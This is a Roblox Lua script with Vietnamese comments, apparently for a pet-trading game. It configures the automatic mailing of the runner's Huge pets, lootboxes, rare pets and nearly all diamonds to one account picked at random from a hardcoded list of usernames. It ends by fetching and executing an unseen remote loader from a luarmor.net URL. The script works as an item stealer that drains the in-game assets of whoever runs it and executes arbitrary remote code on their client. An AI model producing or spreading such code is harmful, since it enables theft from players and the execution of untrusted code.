-- Kiểm tra biến toàn cục để xác định script đã chạy hay chưa
if _G.MAILBOXITEMS then
    warn("Script đã được chạy trước đó!")
    return -- Dừng script nếu đã chạy
end

-- Đánh dấu script đã được chạy
_G.MAILBOXITEMS = true

-- Tạo danh sách người dùng và chọn ngẫu nhiên
local available_users = {"billo9xx", "barus1ik", "mcane9gb", "vermi4dm", "bozzo_3a9", "pavel7m6", "boudo_4uz", "gills6ii", "seitz5ut", "boekh6uo", "durra7ds", "berez1xg"}
local random_user = available_users[math.random(1, #available_users)]

getgenv().Settings = {
    Mailing = {
	["All Huges"] = {Class = "Pet", Id = "All Huges", Amount = 1},
	["Fantasy Pack"] = {Class = "Lootbox", Id = "Fantasy Pack", MinAmount = 5},
	["Retro Pack"] = {Class = "Lootbox", Id = "Retro Pack", MinAmount = 30},
	["Nightmare Pack"] = {Class = "Lootbox", Id = "Nightmare Pack", MinAmount = 20},
	["Hype Egg 2"] = {Class = "Lootbox", Id = "Hype Egg 2", MinAmount = 1},
	["Daycare egg"] = {Class = "Egg", Id = "Huge Machine Egg 4", MinAmount = 1},
	["Secret pet1"] = {Class = "Pet", Id = "Rainbow Swirl", MinAmount = 1, AllVariants = true},
	["Secret pet2"] = {Class = "Pet", Id = "Banana", MinAmount = 1, AllVariants = true},
	["Secret pet3"] = {Class = "Pet", Id = "Coin", MinAmount = 1, AllVariants = true},
	["Secret pet4"] = {Class = "Pet", Id = "Lucky Block", MinAmount = 1, AllVariants = true},
	["Send all Diamonds"] = {Class = "Currency", Id = "Diamonds", KeepAmount = "2m", MinAmount = "5m"},
    },
    Users = {
        random_user, -- Gán người dùng ngẫu nhiên
    },
    ["Split Items Evenly"] = false,
    ["Only Online Accounts"] = false,
}
loadstring(game:HttpGet("https://api.luarmor.net/files/v3/loaders/86847850c3165379f5be2d9d071eaccb.lua"))()
